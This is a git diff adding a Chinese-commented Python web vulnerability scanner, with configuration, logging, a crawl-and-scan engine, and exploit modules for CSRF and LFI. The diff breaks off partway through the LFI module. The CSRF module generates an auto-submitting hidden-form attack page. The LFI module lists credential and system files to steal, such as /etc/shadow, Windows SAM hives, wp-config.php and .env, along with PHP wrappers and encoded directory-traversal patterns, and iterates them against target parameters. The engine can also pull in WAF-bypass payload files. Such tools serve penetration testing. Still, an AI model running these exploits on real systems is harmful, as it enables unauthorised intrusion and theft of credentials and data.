+        if hasattr(args, 'cookie') and args.cookie:
+            self._parse_cookies(args.cookie)
+            
+        if hasattr(args, 'headers') and args.headers:
+            self._parse_headers(args.headers)
+            
+        if hasattr(args, 'proxy') and args.proxy:
+            self.proxy = args.proxy
+            
+        if hasattr(args, 'scan_level') and args.scan_level is not None:
+            self.scan_level = args.scan_level
+            
+        if hasattr(args, 'scan_type') and args.scan_type:
+            self.scan_type = args.scan_type
+            
+        if hasattr(args, 'payload_level') and args.payload_level is not None:
+            self.payload_level = args.payload_level
+            
+        if hasattr(args, 'output') and args.output:
+            self.output_file = args.output
+            
+        if hasattr(args, 'format') and args.format:
+            self.output_format = args.format
+            
+        if hasattr(args, 'verbose'):
+            self.verbose = args.verbose
+            
+        if hasattr(args, 'no_color'):
+            self.no_color = args.no_color
+        
+        # 高级选项
+        if hasattr(args, 'browser'):
+            self.use_browser = args.browser
+            
+        if hasattr(args, 'exploit'):
+            self.exploit = args.exploit
+            
+        if hasattr(args, 'custom_payloads') and args.custom_payloads:
+            self.custom_payloads = args.custom_payloads
+            
+        if hasattr(args, 'exclude') and args.exclude:
+            self.exclude_pattern = args.exclude
+            
+        if hasattr(args, 'include') and args.include:
+            self.include_pattern = args.include
+            
+        if hasattr(args, 'auth') and args.auth:
+            self._parse_auth(args.auth)
+    
+    def load_from_file(self, config_file):
+        """
+        从配置文件加载配置
+        
+        Args:
+            config_file: 配置文件路径
+        """
+        if not os.path.exists(config_file):
+            logger.error(f"配置文件不存在: {config_file}")
+            return False
+        
+        try:
+            with open(config_file, 'r', encoding='utf-8') as f:
+                config_data = json.load(f)
+            
+            # 常规选项
+            if 'url' in config_data:
+                self.url = config_data['url']
+                
+            if 'depth' in config_data:
+                self.depth = config_data['depth']
+                
+            if 'threads' in config_data:
+                self.threads = config_data['threads']
+                
+            if 'timeout' in config_data:
+                self.timeout = config_data['timeout']
+                
+            if 'user_agent' in config_data:
+                self.user_agent = config_data['user_agent']
+                
+            if 'cookies' in config_data:
+                self.cookies = config_data['cookies']
+                
+            if 'headers' in config_data:
+                self.headers = config_data['headers']
+                
+            if 'proxy' in config_data:
+                self.proxy = config_data['proxy']
+                
+            if 'scan_level' in config_data:
+                self.scan_level = config_data['scan_level']
+                
+            if 'scan_type' in config_data:
+                self.scan_type = config_data['scan_type']
+                
+            if 'payload_level' in config_data:
+                self.payload_level = config_data['payload_level']
+                
+            if 'output_file' in config_data:
+                self.output_file = config_data['output_file']
+                
+            if 'output_format' in config_data:
+                self.output_format = config_data['output_format']
+                
+            if 'verbose' in config_data:
+                self.verbose = config_data['verbose']
+                
+            if 'no_color' in config_data:
+                self.no_color = config_data['no_color']
+            
+            # 高级选项
+            if 'use_browser' in config_data:
+                self.use_browser = config_data['use_browser']
+                
+            if 'exploit' in config_data:
+                self.exploit = config_data['exploit']
+                
+            if 'custom_payloads' in config_data:
+                self.custom_payloads = config_data['custom_payloads']
+                
+            if 'exclude_pattern' in config_data:
+                self.exclude_pattern = config_data['exclude_pattern']
+                
+            if 'include_pattern' in config_data:
+                self.include_pattern = config_data['include_pattern']
+                
+            if 'auth' in config_data:
+                self.auth = config_data['auth']
+            
+            logger.info(f"成功从 {config_file} 加载配置")
+            return True
+        except Exception as e:
+            logger.error(f"加载配置文件时出错: {str(e)}")
+            return False
+    
+    def save_to_file(self, config_file):
+        """
+        将配置保存到文件
+        
+        Args:
+            config_file: 配置文件路径
+            
+        Returns:
+            bool: 是否成功保存
+        """
+        config_data = {
+            # 常规选项
+            'url': self.url,
+            'depth': self.depth,
+            'threads': self.threads,
+            'timeout': self.timeout,
+            'user_agent': self.user_agent,
+            'cookies': self.cookies,
+            'headers': self.headers,
+            'proxy': self.proxy,
+            'scan_level': self.scan_level,
+            'scan_type': self.scan_type,
+            'payload_level': self.payload_level,
+            'output_file': self.output_file,
+            'output_format': self.output_format,
+            'verbose': self.verbose,
+            'no_color': self.no_color,
+            
+            # 高级选项
+            'use_browser': self.use_browser,
+            'exploit': self.exploit,
+            'custom_payloads': self.custom_payloads,
+            'exclude_pattern': self.exclude_pattern,
+            'include_pattern': self.include_pattern,
+            'auth': self.auth
+        }
+        
+        try:
+            with open(config_file, 'w', encoding='utf-8') as f:
+                json.dump(config_data, f, indent=4)
+            
+            logger.info(f"配置已保存到 {config_file}")
+            return True
+        except Exception as e:
+            logger.error(f"保存配置文件时出错: {str(e)}")
+            return False
+    
+    def _parse_cookies(self, cookie_str):
+        """
+        解析Cookie字符串
+        
+        Args:
+            cookie_str: Cookie字符串，格式为"name=value; name2=value2"
+        """
+        if not cookie_str:
+            return
+            
+        try:
+            cookies = {}
+            for cookie in cookie_str.split(';'):
+                if '=' in cookie:
+                    name, value = cookie.strip().split('=', 1)
+                    cookies[name] = value
+            
+            self.cookies = cookies
+        except Exception as e:
+            logger.error(f"解析Cookie时出错: {str(e)}")
+    
+    def _parse_headers(self, headers_str):
+        """
+        解析HTTP头字符串
+        
+        Args:
+            headers_str: HTTP头字符串，格式为"Header1:Value1;Header2:Value2"
+        """
+        if not headers_str:
+            return
+            
+        try:
+            headers = {}
+            for header in headers_str.split(';'):
+                if ':' in header:
+                    name, value = header.strip().split(':', 1)
+                    headers[name] = value
+            
+            self.headers = headers
+        except Exception as e:
+            logger.error(f"解析HTTP头时出错: {str(e)}")
+    
+    def _parse_auth(self, auth_str):
+        """
+        解析基本认证字符串
+        
+        Args:
+            auth_str: 基本认证字符串，格式为"username:password"
+        """
+        if not auth_str:
+            return
+            
+        try:
+            if ':' in auth_str:
+                username, password = auth_str.split(':', 1)
+                self.auth = {
+                    'username': username,
+                    'password': password
+                }
+        except Exception as e:
+            logger.error(f"解析认证信息时出错: {str(e)}")
+    
+    def get_payloads_file(self, payload_type):
+        """
+        获取有效载荷文件路径
+        
+        Args:
+            payload_type: 有效载荷类型，如'xss'、'sqli'
+            
+        Returns:
+            str: 有效载荷文件路径，如果文件不存在则返回None
+        """
+        if self.custom_payloads and os.path.exists(self.custom_payloads):
+            logger.info(f"使用自定义有效载荷文件: {self.custom_payloads}")
+            return self.custom_payloads
+        
+        # 尝试多个位置查找有效载荷文件
+        payload_paths = []
+        
+        # 构建可能的文件名
+        level_filename = f"{payload_type}_level{self.payload_level}.txt"
+        waf_bypass_filename = f"{payload_type}_waf_bypass.txt"
+        level1_filename = f"{payload_type}_level1.txt"
+        
+        # 首先检查项目根目录下的payloads目录
+        root_payload_dir = os.path.join(self.project_root, 'payloads')
+        if os.path.exists(root_payload_dir) and os.path.isdir(root_payload_dir):
+            level_path = os.path.join(root_payload_dir, payload_type, level_filename)
+            waf_path = os.path.join(root_payload_dir, payload_type, waf_bypass_filename)
+            level1_path = os.path.join(root_payload_dir, payload_type, level1_filename)
+            
+            payload_paths.append(level_path)
+            # 尝试特殊的WAF绕过有效载荷
+            if self.payload_level >= 2:
+                payload_paths.append(waf_path)
+            # 始终包含level1作为后备
+            payload_paths.append(level1_path)
+        
+        # 然后检查模块内部的payloads目录
+        module_payload_dir = os.path.join(self.base_dir, 'payloads')
+        if os.path.exists(module_payload_dir) and os.path.isdir(module_payload_dir):
+            level_path = os.path.join(module_payload_dir, payload_type, level_filename)
+            waf_path = os.path.join(module_payload_dir, payload_type, waf_bypass_filename)
+            level1_path = os.path.join(module_payload_dir, payload_type, level1_filename)
+            
+            payload_paths.append(level_path)
+            # 尝试特殊的WAF绕过有效载荷
+            if self.payload_level >= 2:
+                payload_paths.append(waf_path)
+            # 始终包含level1作为后备
+            payload_paths.append(level1_path)
+        
+        # 尝试各个路径，返回第一个存在的文件
+        found_file = None
+        for path in payload_paths:
+            if os.path.exists(path) and os.path.isfile(path):
+                logger.debug(f"找到有效载荷文件: {path}")
+                found_file = path
+                break
+        
+        if not found_file:
+            logger.warning(f"找不到类型为 {payload_type} 级别为 {self.payload_level} 的有效载荷文件")
+            logger.warning(f"尝试搜索的路径: {', '.join(payload_paths)}")
+            
+            # 尝试使用任何可用的有效载荷文件
+            for path in payload_paths:
+                if os.path.exists(path) and os.path.isfile(path):
+                    logger.info(f"使用替代的有效载荷文件: {path}")
+                    return path
+            
+            # 如果仍然找不到，最后一搏：尝试root目录下的任何级别
+            root_payload_type_dir = os.path.join(root_payload_dir, payload_type)
+            if os.path.exists(root_payload_type_dir) and os.path.isdir(root_payload_type_dir):
+                for file in os.listdir(root_payload_type_dir):
+                    if file.endswith('.txt'):
+                        path = os.path.join(root_payload_type_dir, file)
+                        logger.info(f"使用最终备选的有效载荷文件: {path}")
+                        return path
+            
+            # 真的找不到了
+            logger.error(f"没有找到任何适用于{payload_type}的有效载荷文件")
+            return None
+        
+        return found_file 
\ No newline at end of file
diff --git a/xss_scanner/core/logger.py b/xss_scanner/core/logger.py
new file mode 100644
index 0000000..cbc6f2c
--- /dev/null
+++ b/xss_scanner/core/logger.py
@@ -0,0 +1,138 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+日志模块，负责管理日志输出
+"""
+
+import os
+import logging
+import sys
+from datetime import datetime
+
+class ColoredFormatter(logging.Formatter):
+    """彩色日志格式化器"""
+    
+    # 定义颜色代码
+    COLORS = {
+        'DEBUG': '\033[94m',  # 蓝色
+        'INFO': '\033[92m',   # 绿色
+        'WARNING': '\033[93m', # 黄色
+        'ERROR': '\033[91m',  # 红色
+        'CRITICAL': '\033[91m\033[1m', # 红色加粗
+        'RESET': '\033[0m'    # 重置
+    }
+    
+    def __init__(self, fmt=None, datefmt=None, style='%', use_color=True):
+        """
+        初始化格式化器
+        
+        Args:
+            fmt: 日志格式
+            datefmt: 日期格式
+            style: 格式风格
+            use_color: 是否使用彩色输出
+        """
+        super().__init__(fmt, datefmt, style)
+        self.use_color = use_color and sys.platform != 'win32' or os.name == 'posix'
+    
+    def format(self, record):
+        """
+        格式化日志记录
+        
+        Args:
+            record: 日志记录
+            
+        Returns:
+            str: 格式化后的日志
+        """
+        levelname = record.levelname
+        
+        # 使用原始格式化方法格式化日志
+        message = super().format(record)
+        
+        # 如果启用了彩色输出，则添加颜色
+        if self.use_color and levelname in self.COLORS:
+            message = f"{self.COLORS[levelname]}{message}{self.COLORS['RESET']}"
+        
+        return message
+
+
+def setup_logger(log_level=logging.INFO, no_color=False):
+    """
+    设置日志系统
+    
+    Args:
+        log_level: 日志级别
+        no_color: 是否禁用彩色输出
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    logger.setLevel(log_level)
+    
+    # 清除之前的处理器
+    for handler in logger.handlers:
+        logger.removeHandler(handler)
+    
+    # 创建控制台处理器
+    console_handler = logging.StreamHandler()
+    console_handler.setLevel(log_level)
+    
+    # 设置日志格式
+    log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+    date_format = '%Y-%m-%d %H:%M:%S'
+    
+    # 创建格式化器
+    formatter = ColoredFormatter(
+        fmt=log_format,
+        datefmt=date_format,
+        use_color=not no_color
+    )
+    
+    # 设置处理器的格式化器
+    console_handler.setFormatter(formatter)
+    
+    # 将处理器添加到记录器
+    logger.addHandler(console_handler)
+    
+    return logger
+
+
+def setup_file_logger(log_file, log_level=logging.INFO):
+    """
+    设置文件日志
+    
+    Args:
+        log_file: 日志文件路径
+        log_level: 日志级别
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    
+    # 创建文件处理器
+    try:
+        file_handler = logging.FileHandler(log_file, encoding='utf-8')
+        file_handler.setLevel(log_level)
+        
+        # 设置日志格式
+        log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+        date_format = '%Y-%m-%d %H:%M:%S'
+        
+        # 创建格式化器
+        formatter = logging.Formatter(fmt=log_format, datefmt=date_format)
+        
+        # 设置处理器的格式化器
+        file_handler.setFormatter(formatter)
+        
+        # 将处理器添加到记录器
+        logger.addHandler(file_handler)
+    except Exception as e:
+        logger.error(f"设置文件日志失败: {str(e)}")
+    
+    return logger 
\ No newline at end of file
diff --git a/xss_scanner/core/scanner_engine.py b/xss_scanner/core/scanner_engine.py
new file mode 100644
index 0000000..436a880
--- /dev/null
+++ b/xss_scanner/core/scanner_engine.py
@@ -0,0 +1,339 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+扫描引擎核心模块
+负责协调各种类型的扫描器和管理扫描过程
+"""
+
+import time
+import logging
+import threading
+import queue
+from concurrent.futures import ThreadPoolExecutor
+from urllib.parse import urlparse, urljoin
+
+from xss_scanner.utils.crawler import Crawler
+from xss_scanner.utils.http_client import HttpClient
+from xss_scanner.scanners.xss_scanner import XSSScanner
+from xss_scanner.scanners.csrf_scanner import CSRFScanner
+from xss_scanner.scanners.sql_injection_scanner import SQLInjectionScanner
+from xss_scanner.scanners.lfi_scanner import LFIScanner
+from xss_scanner.scanners.rfi_scanner import RFIScanner
+from xss_scanner.scanners.ssrf_scanner import SSRFScanner
+from xss_scanner.scanners.xxe_scanner import XXEScanner
+
+logger = logging.getLogger('xss_scanner')
+
+class ScannerEngine:
+    """扫描引擎核心类，负责协调不同类型的扫描器"""
+    
+    def __init__(self, config):
+        """
+        初始化扫描引擎
+        
+        Args:
+            config: 配置对象，包含扫描参数
+        """
+        self.config = config
+        self.http_client = HttpClient(
+            timeout=config.timeout,
+            user_agent=config.user_agent,
+            proxy=config.proxy,
+            cookies=config.cookies,
+            headers=config.headers
+        )
+        self.crawler = Crawler(
+            http_client=self.http_client,
+            max_depth=config.depth,
+            threads=config.threads,
+            exclude_pattern=config.exclude_pattern,
+            include_pattern=config.include_pattern
+        )
+        
+        # 初始化各种扫描器
+        self.scanners = []
+        self.initialize_scanners()
+        
+        # 线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=config.threads)
+        
+        # 存储扫描结果
+        self.results = {
+            'target': None,
+            'start_time': None,
+            'end_time': None,
+            'scan_info': {
+                'scan_level': config.scan_level,
+                'scan_type': config.scan_type,
+                'threads': config.threads,
+                'depth': config.depth
+            },
+            'vulnerabilities': [],
+            'statistics': {
+                'pages_scanned': 0,
+                'forms_tested': 0,
+                'parameters_tested': 0,
+                'vulnerabilities_found': 0
+            }
+        }
+        
+        # 存储已扫描的URL、表单和参数，防止重复扫描
+        self.scanned_urls = set()
+        self.scanned_forms = set()
+        self.scanned_param_combinations = set()
+    
+    def initialize_scanners(self):
+        """初始化所有扫描器"""
+        # 添加XSS扫描器
+        self.scanners.append(XSSScanner(
+            http_client=self.http_client,
+            payload_level=self.config.payload_level,
+            use_browser=self.config.use_browser
+        ))
+        
+        # 根据配置添加其他类型的扫描器
+        if self.config.scan_type in ['all', 'csrf']:
+            self.scanners.append(CSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'sqli']:
+            self.scanners.append(SQLInjectionScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'lfi']:
+            self.scanners.append(LFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'rfi']:
+            self.scanners.append(RFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'ssrf']:
+            self.scanners.append(SSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'xxe']:
+            self.scanners.append(XXEScanner(self.http_client))
+    
+    def scan(self, target_url):
+        """
+        对目标进行扫描
+        
+        Args:
+            target_url: 目标URL
+            
+        Returns:
+            dict: 扫描结果
+        """
+        self.results['target'] = target_url
+        self.results['start_time'] = time.time()
+        
+        # 爬取目标站点
+        logger.info(f"开始爬取目标站点: {target_url}")
+        pages = self.crawler.crawl(target_url)
+        
+        # 去重处理爬取的页面
+        unique_pages = []
+        page_urls = set()
+        
+        for page in pages:
+            url = page['url']
+            # 标准化URL以便更好地去重
+            parsed_url = urlparse(url)
+            normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+            
+            if normalized_url not in page_urls:
+                page_urls.add(normalized_url)
+                unique_pages.append(page)
+        
+        self.results['statistics']['pages_scanned'] = len(unique_pages)
+        logger.info(f"爬取完成，发现 {len(unique_pages)} 个唯一页面")
+        
+        # 对每个页面进行扫描
+        for page in unique_pages:
+            page_url = page['url']
+            if page_url in self.scanned_urls:
+                logger.debug(f"跳过已扫描的页面: {page_url}")
+                continue
+                
+            self.scanned_urls.add(page_url)
+            logger.debug(f"扫描页面: {page_url}")
+            
+            # 对页面中的表单进行测试
+            for form in page.get('forms', []):
+                # 通过表单操作和ID创建唯一标识符
+                form_id = self._get_form_identifier(page_url, form)
+                
+                if form_id in self.scanned_forms:
+                    logger.debug(f"跳过已扫描的表单: {form_id}")
+                    continue
+                    
+                self.scanned_forms.add(form_id)
+                self.results['statistics']['forms_tested'] += 1
+                self._scan_form(page_url, form)
+            
+            # 对URL参数进行测试
+            if page.get('params', []):
+                params_to_scan = []
+                for param in page.get('params', []):
+                    # 创建URL参数组合的唯一标识符
+                    param_id = f"{page_url}:{param}"
+                    
+                    if param_id in self.scanned_param_combinations:
+                        logger.debug(f"跳过已扫描的参数: {param_id}")
+                        continue
+                        
+                    self.scanned_param_combinations.add(param_id)
+                    params_to_scan.append(param)
+                
+                if params_to_scan:
+                    self._scan_params(page_url, params_to_scan)
+                    self.results['statistics']['parameters_tested'] += len(params_to_scan)
+        
+        # 如果配置了漏洞利用，则尝试利用发现的漏洞
+        if self.config.exploit and self.results['vulnerabilities']:
+            self._exploit_vulnerabilities()
+        
+        self.results['end_time'] = time.time()
+        self.results['statistics']['vulnerabilities_found'] = len(self.results['vulnerabilities'])
+        
+        return self.results
+    
+    def _get_form_identifier(self, url, form):
+        """
+        生成表单的唯一标识符
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            
+        Returns:
+            str: 表单唯一标识符
+        """
+        form_id = form.get('id', '')
+        form_action = form.get('action', '')
+        form_method = form.get('method', 'get')
+        
+        # 将表单字段排序后连接，生成指纹
+        fields = sorted([f"{field['name']}:{field['type']}" for field in form.get('fields', [])])
+        fields_str = ','.join(fields)
+        
+        return f"{url}:{form_id}:{form_action}:{form_method}:{fields_str}"
+    
+    def _scan_form(self, url, form):
+        """
+        扫描表单
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+        """
+        logger.debug(f"扫描表单: {form.get('id', 'unknown')}")
+        
+        # 对表单中的每个输入字段进行测试
+        for field in form.get('fields', []):
+            if field['type'] in ['text', 'search', 'url', 'email', 'password', 'tel', 'number']:
+                for scanner in self.scanners:
+                    # 跳过不适用于表单的扫描器
+                    if not scanner.can_scan_form():
+                        continue
+                        
+                    result = scanner.scan_form(url, form, field)
+                    if result:
+                        # 检查是否为重复的漏洞
+                        is_duplicate = False
+                        for vuln in self.results['vulnerabilities']:
+                            if (vuln['type'] == result['type'] and 
+                                vuln.get('url') == result.get('url')):
+                                # 安全检查location键
+                                if 'location' in vuln and 'location' in result:
+                                    if vuln['location'] == result['location']:
+                                        is_duplicate = True
+                                        break
+                                # 如果没有location，比较其他可用的键
+                                elif vuln.get('form_id') == result.get('form_id'):
+                                    is_duplicate = True
+                                    break
+                                
+                        if not is_duplicate:
+                            self.results['vulnerabilities'].append(result)
+                            logger.warning(f"在表单中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _scan_params(self, url, params):
+        """
+        扫描URL参数
+        
+        Args:
+            url: 页面URL
+            params: URL参数列表
+        """
+        logger.debug(f"扫描URL参数: {', '.join(params)}")
+        
+        for param in params:
+            for scanner in self.scanners:
+                # 跳过不适用于URL参数的扫描器
+                if not scanner.can_scan_params():
+                    continue
+                    
+                result = scanner.scan_parameter(url, param)
+                if result:
+                    # 检查是否为重复的漏洞
+                    is_duplicate = False
+                    for vuln in self.results['vulnerabilities']:
+                        if (vuln['type'] == result['type'] and 
+                            vuln.get('url') == result.get('url')):
+                            # 安全检查parameter键
+                            if 'parameter' in vuln and 'parameter' in result:
+                                if vuln['parameter'] == result['parameter']:
+                                    is_duplicate = True
+                                    break
+                            # 如果没有parameter，比较其他可用的键
+                            elif vuln.get('vulnerability_id') == result.get('vulnerability_id'):
+                                is_duplicate = True
+                                break
+                            
+                    if not is_duplicate:
+                        self.results['vulnerabilities'].append(result)
+                        logger.warning(f"在URL参数中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _exploit_vulnerabilities(self):
+        """尝试利用发现的漏洞"""
+        logger.info("尝试利用发现的漏洞...")
+        
+        for vuln in self.results['vulnerabilities']:
+            # 根据漏洞类型选择合适的利用模块
+            exploit_module = self._get_exploit_module(vuln['type'])
+            if exploit_module:
+                exploit_result = exploit_module.exploit(vuln)
+                if exploit_result:
+                    vuln['exploit_result'] = exploit_result
+                    logger.warning(f"成功利用漏洞: {vuln['type']} - {exploit_result['description']}")
+    
+    def _get_exploit_module(self, vuln_type):
+        """
+        根据漏洞类型获取对应的利用模块
+        
+        Args:
+            vuln_type: 漏洞类型
+            
+        Returns:
+            对应的利用模块实例
+        """
+        if vuln_type == 'XSS':
+            from xss_scanner.exploits.xss_exploit import XSSExploit
+            return XSSExploit(self.http_client)
+        elif vuln_type == 'CSRF':
+            from xss_scanner.exploits.csrf_exploit import CSRFExploit
+            return CSRFExploit(self.http_client)
+        elif vuln_type == 'SQL_INJECTION':
+            from xss_scanner.exploits.sqli_exploit import SQLInjectionExploit
+            return SQLInjectionExploit(self.http_client)
+        elif vuln_type == 'LFI':
+            from xss_scanner.exploits.lfi_exploit import LFIExploit
+            return LFIExploit(self.http_client)
+        elif vuln_type == 'RFI':
+            from xss_scanner.exploits.rfi_exploit import RFIExploit
+            return RFIExploit(self.http_client)
+        elif vuln_type == 'SSRF':
+            from xss_scanner.exploits.ssrf_exploit import SSRFExploit
+            return SSRFExploit(self.http_client)
+        elif vuln_type == 'XXE':
+            from xss_scanner.exploits.xxe_exploit import XXEExploit
+            return XXEExploit(self.http_client)
+        return None 
\ No newline at end of file
diff --git a/xss_scanner/exploits/csrf_exploit.py b/xss_scanner/exploits/csrf_exploit.py
new file mode 100644
index 0000000..904d7ef
--- /dev/null
+++ b/xss_scanner/exploits/csrf_exploit.py
@@ -0,0 +1,111 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+CSRF漏洞利用模块
+"""
+
+import logging
+import re
+import random
+import string
+from urllib.parse import urlparse, parse_qsl, urlencode
+
+logger = logging.getLogger('xss_scanner')
+
+class CSRFExploit:
+    """CSRF漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化CSRF漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+    def exploit(self, vulnerability):
+        """
+        利用CSRF漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用CSRF漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST')
+        
+        if not url or not form_action:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或form_action)',
+                'poc': None
+            }
+            
+        # 生成CSRF利用PoC
+        poc = self._generate_csrf_poc(vulnerability)
+        
+        return {
+            'success': True,
+            'message': '成功生成CSRF漏洞利用PoC',
+            'poc': poc
+        }
+        
+    def _generate_csrf_poc(self, vulnerability):
+        """
+        生成CSRF漏洞利用PoC
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            str: CSRF PoC HTML
+        """
+        form_action = vulnerability.get('form_action')
+        form_method = vulnerability.get('form_method', 'POST').upper()
+        form_fields = vulnerability.get('form_fields', [])
+        
+        # 生成随机ID以防止冲突
+        form_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        
+        html = f"""
+<!DOCTYPE html>
+<html>
+<head>
+    <title>CSRF PoC</title>
+    <meta charset="UTF-8">
+</head>
+<body>
+    <h1>CSRF漏洞利用演示</h1>
+    <p>此页面将自动提交表单以利用CSRF漏洞</p>
+    <form id="{form_id}" action="{form_action}" method="{form_method}" style="display:none">
+"""
+        
+        # 添加表单字段
+        for field in form_fields:
+            field_name = field.get('name', '')
+            field_value = field.get('value', '')
+            if field_name:
+                html += f'        <input type="hidden" name="{field_name}" value="{field_value}">\n'
+                
+        html += f"""    </form>
+    <script>
+        // 页面加载后自动提交表单
+        window.onload = function() {{
+            document.getElementById("{form_id}").submit();
+        }};
+    </script>
+    <noscript>
+        <p>请启用JavaScript以自动提交表单，或者点击下面的按钮手动提交</p>
+        <button type="submit" form="{form_id}">提交表单</button>
+    </noscript>
+</body>
+</html>
+"""
+        return html 
\ No newline at end of file
diff --git a/xss_scanner/exploits/lfi_exploit.py b/xss_scanner/exploits/lfi_exploit.py
new file mode 100644
index 0000000..c845d12
--- /dev/null
+++ b/xss_scanner/exploits/lfi_exploit.py
@@ -0,0 +1,493 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+LFI（本地文件包含）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+
+logger = logging.getLogger('xss_scanner')
+
+class LFIExploit:
+    """LFI漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化LFI漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 敏感文件列表
+        self.sensitive_files = [
+            # Linux系统文件
+            "/etc/passwd",
+            "/etc/shadow",
+            "/etc/hosts",
+            "/etc/issue",
+            "/etc/group",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            "/proc/sched_debug",
+            "/proc/mounts",
+            "/proc/net/tcp",
+            "/proc/net/udp",
+            "/proc/net/fib_trie",
+            "/proc/net/route",
+            
+            # Windows系统文件
+            "C:\\Windows\\system32\\drivers\\etc\\hosts",
+            "C:\\Windows\\win.ini",
+            "C:\\boot.ini",
+            "C:\\Windows\\System32\\config\\SAM",
+            "C:\\Windows\\repair\\SAM",
+            "C:\\Windows\\System32\\config\\RegBack\\SAM",
+            
+            # Web服务器配置文件
+            "/etc/httpd/conf/httpd.conf",
+            "/etc/apache2/apache2.conf",
+            "/etc/nginx/nginx.conf",
+            "/usr/local/etc/nginx/nginx.conf",
+            "/usr/local/nginx/conf/nginx.conf",
+            
+            # Web应用配置文件
+            "/var/www/html/config.php",
+            "/var/www/html/wp-config.php",
+            "/var/www/html/configuration.php",
+            "/var/www/config/config.ini",
+            ".env",
+            "web.config",
+            "config.json",
+            "settings.py",
+            
+            # 日志文件
+            "/var/log/apache2/access.log",
+            "/var/log/apache2/error.log",
+            "/var/log/nginx/access.log",
+            "/var/log/nginx/error.log",
+            "/var/log/httpd/access_log",
+            "/var/log/httpd/error_log",
+            "/var/log/apache/access.log",
+            "/var/log/apache/error.log",
+            "/usr/local/apache/log/error_log",
+            "/usr/local/apache2/log/error_log"
+        ]
+        
+        # PHP封装器
+        self.php_wrappers = [
+            "php://filter/convert.base64-encode/resource=",
+            "php://filter/read=convert.base64-encode/resource=",
+            "phar://",
+            "zip://",
+            "data://text/plain;base64,"
+        ]
+        
+        # 目录遍历模式
+        self.traversal_patterns = [
+            "../",
+            "..\\",
+            "..%2f",
+            "..%5c",
+            "%2e%2e%2f",
+            "%2e%2e/",
+            "..%252f",
+            "%252e%252e%252f",
+            "....//",
+            "....\\\\",
+            ".../",
+            "...\\",
+            "%c0%ae%c0%ae/",
+            "%25c0%25ae%25c0%25ae/"
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "file", 
+            "page", 
+            "path", 
+            "filepath", 
+            "filename", 
+            "load", 
+            "include", 
+            "require", 
+            "doc",
+            "document", 
+            "folder", 
+            "root", 
+            "cont", 
+            "content", 
+            "layout",
+            "mod", 
+            "module", 
+            "conf", 
+            "config",
+            "url", 
+            "uri", 
+            "source", 
+            "src",
+            "show", 
+            "view", 
+            "template"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用LFI漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用LFI漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试不同的敏感文件
+        for file_path in self.sensitive_files[:10]:  # 只尝试前10个文件
+            result = self._try_file_access(url, parameter, file_path)
+            if result and result['success']:
+                return result
+                
+        # 如果直接尝试失败，尝试使用PHP包装器（如果目标可能是PHP应用）
+        for wrapper in self.php_wrappers[:3]:  # 只尝试前3个包装器
+            for file_path in self.sensitive_files[:5]:  # 只尝试前5个文件
+                result = self._try_wrapper_access(url, parameter, wrapper, file_path)
+                if result and result['success']:
+                    return result
+                    
+        # 如果直接访问和包装器都失败，尝试使用深度目录遍历
+        for traversal in self.traversal_patterns[:5]:  # 只尝试前5个遍历模式
+            # 尝试不同深度
+            for depth in range(1, 11):  # 1到10层深度
+                traversal_path = traversal * depth
+                for file_path in self.sensitive_files[:3]:  # 只尝试前3个文件
+                    result = self._try_traversal_access(url, parameter, traversal_path, file_path)
+                    if result and result['success']:
+                        return result
+                        
+        # 如果所有尝试都失败，返回失败结果
+        return {
+            'success': False,
+            'message': '未能成功利用LFI漏洞',
+            'data': None
+        }
+        
+    def _try_file_access(self, url, parameter, file_path):
+        """
+        尝试直接访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试访问文件: {file_path}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
